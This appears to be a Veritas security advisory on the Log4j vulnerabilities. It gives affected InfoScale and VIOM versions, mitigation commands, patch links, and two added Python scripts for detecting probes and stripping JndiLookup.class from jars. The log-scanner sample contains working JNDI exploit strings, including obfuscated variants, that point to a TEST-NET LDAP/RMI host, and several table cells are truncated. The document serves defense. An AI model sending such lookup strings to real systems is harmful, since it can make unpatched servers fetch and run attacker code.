About Apache Log4j Vulnerabilities
Apache Log4j is an open-source, Java-based logging utility widely used by enterprise applications and cloud services. The Apache Software Foundation has released several security advisories addressing remote code execution and denial-of-service vulnerabilities in Log4j 2 versions 2.0-beta9 through 2.16.0 (CVE-2021-44832 extends to 2.17.0), alongside two older deserialization issues in the end-of-life Log4j 1.2 branch. A remote attacker could exploit these vulnerabilities to take control of an affected system.
More information is available in the Apache announcement, which recommends upgrading to the latest Log4j release or applying the recommended mitigations immediately.
Issues
CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can get a crafted lookup string such as ${jndi:ldap://...} into any logged field (for example an HTTP header) can make the application fetch and execute remote code.
Severity: Critical
Base CVSS Score: 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
Versions Affected: 2.0-beta9 through 2.14.1
CVE-2021-45046: The fix for CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations (a Pattern Layout using a Context Lookup or a Thread Context Map pattern), which lets an attacker who controls Thread Context data craft malicious lookup input. Apache initially scored this 3.7 and later raised it to 9.0 after the issue was shown to permit information leakage and remote code execution in some environments.
Base CVSS Score: 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L), subsequently revised to 9.0
Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0
CVE-2021-45105: Apache Log4j2 does not always protect from infinite recursion in lookup evaluation; a self-referential lookup in attacker-controlled Thread Context data can exhaust the stack and cause a denial of service.
Base CVSS Score: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)
Versions Affected: all versions from 2.0-beta9 through 2.16.0
CVE-2021-4104 (JMSAppender): JMSAppender in Log4j 1.2 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration. Log4j 1.2 is end of life and receives no upstream fixes.
CVE-2021-44832: An attacker with permission to modify the logging configuration can define a JDBC Appender whose data source references a JNDI URI and thereby execute remote code; fixed in Log4j 2.17.1. InfoScale and VIOM patches were released with Log4j 2.17.1. Links are updated below.
Base CVSS Score: 6.6
CVE-2019-17571: Log4j 1.2 includes a SocketServer class that is vulnerable to deserialization of untrusted data; when it listens for log data on untrusted network traffic and a suitable deserialization gadget is on the classpath, this can be exploited to remotely execute arbitrary code. This affects Log4j 1.2 up to and including 1.2.17.
CVSS Base Score: 9.8 (Critical Severity)
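Since CVE-2021-44228 is triggered by a lookup string arriving in any logged field, the first question an operator of an exposed VIOM or InfoScale host asks is whether such strings have already shown up in web or application logs. The following script is an added example for this advisory, not Veritas or Apache code. It normalizes the nesting tricks that Log4j 2 itself would evaluate before the JNDI lookup (default-value `${x:-j}` / `${::-j}` and `${lower:}` / `${upper:}` wrappers) so that obfuscated probes collapse to the plain `${jndi:` form, then flags matching lines. The SAMPLE_LOG entries are constructed Apache-style access log lines using TEST-NET addresses; the function and variable names are this example's own.

```python
"""Detect CVE-2021-44228 probe strings in log lines, including the
lookup-nesting tricks used to evade naive "${jndi:" matching.
Added example for this advisory, not Veritas or Apache code; the
SAMPLE_LOG lines are constructed, with TEST-NET addresses."""
import re

# Innermost ${...} with no nested braces; resolved from the inside out.
_INNER = re.compile(r"\$\{([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(m):
    """Collapse the obfuscation wrappers Log4j 2 would evaluate before the
    JNDI lookup: ${x:-j} / ${::-j} (default value) and ${lower:J} / ${upper:j}.
    Anything else is returned unchanged so a real ${jndi:...} survives."""
    inner = m.group(1)
    if ":-" in inner:
        return inner.split(":-", 1)[1]
    head, sep, rest = inner.partition(":")
    if sep and head.strip().lower() == "lower":
        return rest.lower()
    if sep and head.strip().lower() == "upper":
        return rest.upper()
    return m.group(0)


def normalize(text):
    """Apply _resolve until the string stops changing. Each pass either removes
    a wrapper or leaves the string as it is, so the loop terminates."""
    while True:
        new = _INNER.sub(_resolve, text)
        if new == text:
            return text
        text = new


def is_jndi_probe(line):
    """True when the line, after normalization, carries a ${jndi:...} lookup."""
    return _JNDI.search(normalize(line)) is not None


def scan(lines):
    """Return (index, normalized line) for every line that carries a JNDI lookup."""
    return [(i, normalize(line)) for i, line in enumerate(lines) if is_jndi_probe(line)]


# Constructed sample: one benign request, three probes of increasing
# obfuscation, and one benign line that contains a non-JNDI lookup.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Dec/2021:10:12:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:12:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:12:06 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.10/x}"',
    '203.0.113.9 - - [10/Dec/2021:10:12:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10/y}"',
    '203.0.113.7 - - [10/Dec/2021:10:12:09 +0000] "GET /report?d=${date:yyyy} HTTP/1.1" 200 88 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for idx, norm in scan(SAMPLE_LOG):
        print(f"line {idx}: {norm}")
```

A clean scan does not prove the host was not probed: the lookup may have arrived in a field the access log does not record, and the normalizer only handles the wrapper forms listed above. Treat a hit as confirmation that the mitigation steps below are urgent, and check the Tomcat and application logs rather than only the access log.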
Note 1: The mitigation steps and hotfix (HF) below were released to address both CVE-2021-44228 and CVE-2021-45046.
Note 2: CVE-2021-45105 is not exploitable in InfoScale Licensing Service or Veritas InfoScale Operations Manager – Management Server.
Note 3: Windows Managed Hosts (MHs) were impacted by CVE-2021-4104 and CVE-2019-17571. The permanent fix is included in the table below.
Affected Versions
Veritas is aware of this recently announced zero-day vulnerability and both Product Security and Development teams are actively reviewing our software to determine if the vulnerability exists in any of our products.
If we determine that a particular product is impacted by the issue, Veritas will provide temporary mitigation guidance while we work to quickly provide a patch that permanently addresses the issue. This is an urgent issue, and we are working aggressively to help keep our customers secure. We will provide updates and guidance as soon as possible.
Product / Component | Version | Mitigation Steps | Permanent Fix
Veritas InfoScale Operations Manager – Management Server | 7.3.1 and lower (Linux) | Veritas strongly recommends that customers upgrade to Veritas InfoScale Operations Manager 7.4.2 or the latest release in order to be able to perform the mitigation steps provided below. | https://www.veritas.com/support/en_US/downloads/update.UPD329228
Veritas InfoScale Operations Manager – Management Server | 7.3.1 and lower (Windows) | Veritas strongly recommends that customers upgrade to Veritas InfoScale Operations Manager 7.4.2 or the latest release. |
Veritas InfoScale Operations Manager – Management Server | 7.4 (Linux) | Perform the mitigation steps provided below only if |
Veritas InfoScale Operations Manager – Management Server | 7.4.2, 8.0 (Linux) | Follow the mitigation steps. |
Veritas InfoScale Operations Manager – Management Server | 7.4, 7.4.2, 8.0 (Windows) | Stop the cmsCollector after every reboot: %ProgramFiles%\Veritas\VRTSsfmcs\bin\cmsCollector.exe -tcstop |
Veritas InfoScale Operations Manager – Management Server | 7.0 to 8.0, Windows VIOM Agent (Managed Hosts) | No mitigation steps. | https://www.veritas.com/support/en_US/downloads/update.UPD329228
Veritas InfoScale Operations Manager – Management Server | 7.0 and earlier, Windows VIOM Agent (Managed Hosts) | No mitigation steps. | 1) Upgrade to the latest VIOM Agent (7.4.2.500). 2) Install the hotfix https://www.veritas.com/support/en_US/downloads/update.UPD329228 OR remove the "C:\Program Files\Veritas\VRTSsfmh\lib\jars\vmf." folder.
InfoScale Licensing Service | 8.0 | N/A. Not using Java. |
InfoScale Licensing Service | 8.0 Containers (Kubernetes / OpenShift) | No mitigation steps. | If InfoScale 8.0 or 8.0.1 is already deployed, remove it and perform a fresh deployment of InfoScale 8.0.20. 1. For OpenShift clusters with internet connectivity, install InfoScale Operator Bundle 8.0.20 from the Red Hat catalog (OperatorHub); the latest InfoScale Operator Bundle (8.0.20) is available at the location below. 2. For OpenShift clusters in a restricted network environment, and for Kubernetes, the InfoScale image and YAML tarball are available from the Veritas Download Center: https://www.veritas.com/support/en_US/downloads/update.UPD713174
InfoScale Licensing Service | 7.4.3 | Perform the mitigation steps provided below. | Fix details are included below the mitigation steps. Note : For 6.2 to 7.4 (Linux/Unix) and 7.0 to 7.4 (Windows), install the hotfix only if the UIS licensing service was deployed by specifically installing the sig_licensing update. This can be verified on the system by checking for the presence of the file. Linux/Unix: Windows: Go to the InfoScale installation directory. Example-
InfoScale Licensing Service | 7.4.1 and 7.4.2 | Follow the mitigation steps as a temporary workaround. | Upgrade to the latest VRTSvlic patch (Python-based collector) for Linux, or to the sig_licensing-WIN-Patch (Python-based collector) for Windows.
InfoScale Licensing Service | 6.2 to 7.4 (Linux/Unix) | These versions are vulnerable only if the UIS licensing service was deployed by specifically installing the sig_licensing update. This can be verified on the system by checking for this file. Linux/Unix: If the files are present, stop the TelemetryCollector as described in the mitigation steps. |
InfoScale Licensing Service | 7.0 to 7.4 (Windows) | These versions are vulnerable only if the UIS licensing service was deployed by specifically installing the sig_licensing update. This can be verified on the system by checking for this file. Windows: Go to the InfoScale installation directory. Example- If the files are present, stop the TelemetryCollector as described in the mitigation steps. |
Storage Foundation Licensing Service | 6.1 and earlier (Linux/Unix) | N/A. Not using Java. |
Storage Foundation Licensing Service | 7.4.3, 6.1 and earlier (Windows) | Not impacted. |
Veritas Management Console (Java GUI) & Veritas Enterprise Administrator (VEA) | All versions | These tools do not use Log4j, so they are not exposed. |
*** This KB article covers mitigation steps for products/components identified in the above table ***
Please revisit this document for any changes as we continue our investigation.
When making changes recommended below, please see the following notes.
NOTE 1 : The Java GUI and VEA do not use Log4j and are not exposed.
NOTE 2 : For VIOM Management HA-DR servers, ensure the mitigation steps are completed on all active and inactive nodes of the cluster.
Mitigation steps for Veritas InfoScale Management Primary server
Mitigation for Veritas InfoScale Operations Manager (VIOM) 7.4, 7.4.2 and 8.0 - Linux
1) Log in to the VIOM Management Server as an admin/root user.
2) Stop the VIOM web server.
# /opt/VRTSsfmcs/bin/vomsc --stop web
3) Remove the JndiLookup class from /opt/VRTSsfmcs/webgui/tomcat/lib/log4j-core.jar (the loop below also catches any other log4j-core jar under /opt/VRTSsfmcs). Keep a backup copy of each jar first so the change can be reverted.
# for log4jcore in `find /opt/VRTSsfmcs -name \*log4j\*core\*.jar 2> /dev/null`; do echo "$log4jcore"; zip -q -d "$log4jcore" org/apache/logging/log4j/core/lookup/JndiLookup.class; done
Note : The zip utility is required to run the above command. Removing JndiLookup.class disables the JNDI lookup abused by CVE-2021-44228 and CVE-2021-45046; it does not change the Log4j version recorded in the jar, so version-based scanners will keep reporting the jar until the permanent fix is applied.
Example Output: /opt/VRTSsfmcs/webgui/tomcat/lib/log4j-core.jar
4) Start the web service.
# /opt/VRTSsfmcs/bin/vomsc --start web
5) Stop the cmsCollector service.
# /opt/VRTSsfmcs/bin/cmsCollector -tcstop
6) Verify the cmsCollector status.
# /opt/VRTSsfmcs/bin/cmsCollector -status
Note 1 : Steps 5 and 6 need to be repeated after every reboot.
Note 2 : Ignore the "Either cmsCollector process is not running or valid license key is not installed for this Management Server." fault in the VIOM Management Console.
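Step 3 above strips JndiLookup.class with zip -d, but on a fleet of management servers you also want to confirm which log4j-core jars are present, what version they carry, and whether the class is really gone before and after the change. The following script is an added example for this advisory, not Veritas or Apache code. It mirrors the find pattern used in step 3, reads the version from the jar's Maven pom.properties, classifies each jar, and rewrites exposed jars without JndiLookup.class (Python's zipfile cannot delete in place, so it copies every other entry to a temp file and swaps it in). The jars produced by build_sample_jar() are constructed stand-ins with dummy class bytes, not real Log4j binaries, and treating 2.17.1 (the level this advisory's hotfix ships) as the patched baseline is this example's own simplification.

```python
"""Find log4j-core jars, report their version and whether JndiLookup.class is
still present, and strip that class the same way the zip -d step does.
This is an added example for this advisory, not Veritas or Apache code; the
jars created by build_sample_jar() are constructed stand-ins with dummy
class bytes, not real Log4j binaries."""
import fnmatch
import os
import re
import tempfile
import zipfile

JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Assumption: 2.17.1 (the level this advisory's hotfix ships) is the patched
# baseline; the 2.3.x/2.12.x security backports are ignored for simplicity.
PATCHED_BASELINE = (2, 17, 1)


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9) (digits only, three parts)."""
    return tuple(int(x) for x in re.findall(r"\d+", text))[:3]


def find_log4j_core_jars(root):
    """Same selection as `find <root> -name '*log4j*core*.jar'`."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if fnmatch.fnmatch(name.lower(), "*log4j*core*.jar"):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def assess_jar(path):
    """Read the Maven pom.properties for the version and check for JndiLookup."""
    with zipfile.ZipFile(path) as zf:
        names = set(zf.namelist())
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_CLASS in names
    if not has_jndi:
        status = "mitigated"      # JNDI lookup vector for CVE-2021-44228/45046 removed
    elif version and parse_version(version) >= PATCHED_BASELINE:
        status = "patched"
    else:
        status = "exposed"
    return {"path": path, "version": version,
            "jndi_lookup_present": has_jndi, "status": status}


def remove_jndi_lookup(path):
    """Rewrite the jar without JndiLookup.class. zipfile cannot delete in place,
    so copy every other entry to a temp file and atomically swap it in.
    Returns True if the class was removed, False if it was already absent."""
    with zipfile.ZipFile(path) as src:
        if JNDI_CLASS not in src.namelist():
            return False
        fd, tmp = tempfile.mkstemp(dir=os.path.dirname(path) or ".", suffix=".tmp")
        os.close(fd)
        with zipfile.ZipFile(tmp, "w") as dst:
            for info in src.infolist():
                if info.filename != JNDI_CLASS:
                    dst.writestr(info, src.read(info.filename))
    os.replace(tmp, path)
    return True


def build_sample_jar(dest_dir, version, include_jndi=True):
    """Constructed test jar (not a real Log4j build) named like the real artifact."""
    path = os.path.join(dest_dir, f"log4j-core-{version}.jar")
    with zipfile.ZipFile(path, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                    f"artifactId=log4j-core\nversion={version}\n")
        zf.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")
    return path


def run_demo():
    """Build one exposed and one patched sample jar, scan, mitigate, rescan."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    build_sample_jar(root, "2.14.1")
    build_sample_jar(root, "2.17.1")
    before = [assess_jar(j) for j in find_log4j_core_jars(root)]
    removed = [remove_jndi_lookup(r["path"]) for r in before if r["status"] == "exposed"]
    after = [assess_jar(j) for j in find_log4j_core_jars(root)]
    return {"before": before, "removed": removed, "after": after}


if __name__ == "__main__":
    result = run_demo()
    for phase in ("before", "after"):
        for r in result[phase]:
            present = "present" if r["jndi_lookup_present"] else "absent"
            print(f"{phase}: {os.path.basename(r['path'])} version={r['version']} "
                  f"JndiLookup={present} -> {r['status']}")
```

To use it against a real server, replace the temp directory in run_demo() with /opt/VRTSsfmcs, stop the web server first as in step 2, and only call remove_jndi_lookup() on jars reported as "exposed"; the "mitigated" state confirms the class is gone but, as the note above says, leaves the jar's recorded version unchanged.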
Mitigation steps for Veritas InfoScale Licensing Service
Linux, UNIX Platforms (All affected versions):
Stop the Telemetry Collector. This step must be repeated after every system reboot.
# /opt/VRTSvlic/tele/bin/TelemetryCollector -tcstop
# /opt/VRTSvlic/tele/bin/TelemetryCollector -status (should report stopped)
Windows Platform (All affected versions):
Stop the Telemetry Collector process. This step must be repeated after every system reboot.
Go to the InfoScale installation directory.
Example- C:\Program Files\Veritas\Veritas Shared\VPI\{F834E070-8D71-4c4b-B688-06964B88F3E8}\{7.4.20000.1}\
Note : The {F834E070-8D71-4c4b-B688-06964B88F3E8}\{7.4.20000.1} part differs per InfoScale node depending on the host and the InfoScale version.
1. Open a command prompt and change to the path above.
2. Run: TelemetryCollector.exe -tcstop
Ignore the "TelemetryCollector process is not running on this host" fault in the VIOM Management Console if the InfoScale server reports to a VIOM Management Server.
Permanent Fix for Veritas InfoScale Licensing Service
Links to the permanent fix (which replaces the Java-based collector with a Python-based one for InfoScale)
Windows (7.4.2):
sig_licensing-WIN-Patch-7.4.2.300: https://www.veritas.com/support/en_US/downloads/update.UPD321727.html
RHEL (7.4.2):
RHEL7 7.4.2 U3: https://www.veritas.com/support/en_US/downloads/update.UPD248334.html
RHEL8 7.4.2 U3: https://www.veritas.com/support/en_US/downloads/update.UPD251267
SLES12 (7.4.2):
7.4.2 U3: https://www.veritas.com/support/en_US/downloads/update.UPD966604
SLES15 (7.4.2) : Includes SLES 15 SP3 support
7.4.2 : https://www.veritas.com/support/en_US/downloads/update.UPD772018
Solaris (7.4.2):
SPARC infoscale-sol11_sparc-Patch-7.4.2.1200: https://www.veritas.com/support/en_US/downloads/update.UPD553948
X64 infoscale-sol11_x64-Patch-7.4.2.1200: https://www.veritas.com/support/en_US/downloads/update.UPD584298
AIX (7.4.2):
infoscale-aix-Patch-7.4.2.1200: https://www.veritas.com/support/en_US/downloads/update.UPD800834
Note :
1) All of the above permanent fixes for Linux/Unix environments require downtime.
2) For Linux/Unix, use the CPI patch for 7.4.2 Update 3 as well as for the P patches mentioned above: https://www.veritas.com/support/en_US/downloads/update.UPD298738
Patches for all platforms for 7.4.1 can be downloaded from the below locations:
Windows (7.4.1):
sig_licensing-WIN-Patch-7.4.1.300: https://www.veritas.com/support/en_US/downloads/update.UPD469608
RHEL (7.4.1):
RHEL6 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD605225
RHEL7 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD691569
RHEL8 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD474669
SLES (7.4.1):
SLES12 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD365798
SLES15 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD666944
Solaris (7.4.1):
SPARC Solaris 11 7.4.1 U6 : https://www.veritas.com/support/en_US/downloads/update.UPD202244
X86 Solaris 11 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD982913
AIX (7.4.1)
AIX 7.4.1 U6: https://www.veritas.com/support/en_US/downloads/update.UPD511843
SLES 11 (7.4.1) is not included in 7.4.1 Update 6, so the licensing patch was released as a component patch: https://www.veritas.com/support/en_US/downloads/update.UPD518518
Note :
1) All of the above permanent fixes for Linux/Unix environments require downtime.
2) For Linux/Unix, use the CPI patch for 7.4.1 Update 6 as well as for the P patches mentioned above: https://www.veritas.com/support/en_US/downloads/update.UPD715008
Hot fix for Veritas InfoScale Licensing Service
For InfoScale 7.4 to 7.4.3 (sig_licensing-log4j-2.17.1-HF-7.4-to-7.4.3)
Supported Operating Systems: RHEL6/7/8 x86-64, SLES11/12/15 x86-64 ,Solaris 11 SPARC, Solaris 11 x86 , AIX
https://www.veritas.com/support/en_US/downloads/update.UPD838718
For InfoScale 7.0 to 7.3.1 (sig_licensing-log4j-2.17.1-HF-7.0-to-7.3.1)
Supported Operating Systems: RHEL6/7 x86-64 , SLES11/12 x86-64 , Solaris 11 SPARC , Solaris 11 x86 , AIX
https://www.veritas.com/support/en_US/downloads/update.UPD211523
For SF 6.2 to 6.2.1 (sig_licensing-log4j-2.17.1-HF-6.2-to-6.2.1 )
Supported Operating Systems: RHEL6/7 x86-64 , SLES11/12 x86-64 , Solaris 11 SPARC , AIX
https://www.veritas.com/support/en_US/downloads/update.UPD864693
For Infoscale 7.0 to 7.4.2 Windows (InfoScale_sig_licensing_log4j-2.17.1_7.0_to_7.4.2_HF )
Supported Operating Systems: Windows 2012,2016 and 2019 Servers
https://www.veritas.com/support/en_US/downloads/update.UPD190323
Note : Downtime is not required for the Veritas InfoScale Licensing Service hotfix.
Disclaimer
THE SECURITY ADVISORY IS PROVIDED "AS IS" AND ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE DISCLAIMED, EXCEPT TO THE EXTENT THAT SUCH DISCLAIMERS ARE HELD TO BE LEGALLY INVALID. VERITAS TECHNOLOGIES LLC SHALL NOT BE LIABLE FOR INCIDENTAL OR CONSEQUENTIAL DAMAGES IN CONNECTION WITH THE FURNISHING, PERFORMANCE, OR USE OF THIS DOCUMENTATION. THE INFORMATION CONTAINED IN THIS DOCUMENTATION IS SUBJECT TO CHANGE WITHOUT NOTICE.